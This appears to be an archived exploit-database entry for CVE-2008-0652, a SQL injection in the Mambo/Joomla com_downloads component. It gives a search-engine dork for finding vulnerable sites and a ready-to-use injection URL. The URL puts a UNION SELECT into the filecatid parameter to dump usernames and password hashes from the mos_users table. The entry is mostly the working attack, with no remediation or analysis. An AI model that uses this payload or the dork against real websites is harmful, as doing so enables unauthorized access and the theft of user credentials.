Mambo Component com_downloads - SQL Injection

Author: S@BUN
type: webapps
platform: php
port: 
date_added: 2008-02-05 
date_updated:  
verified: 1 
codes: OSVDB-41440;CVE-2008-0652 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################################
#
# joomla SQL Injection(com_downloads)(filecatid)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl :"com_downloads"filecatid
#
##########################################################################
EXPLOIT :

index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*


##########################################################################
# S@BUN                           www.hackturkiye.com                     S@BUN
##########################################################################
# S@BUN                              i AM NOT HACKER                      S@BUN
##########################################################################

# milw0rm.com [2008-02-06]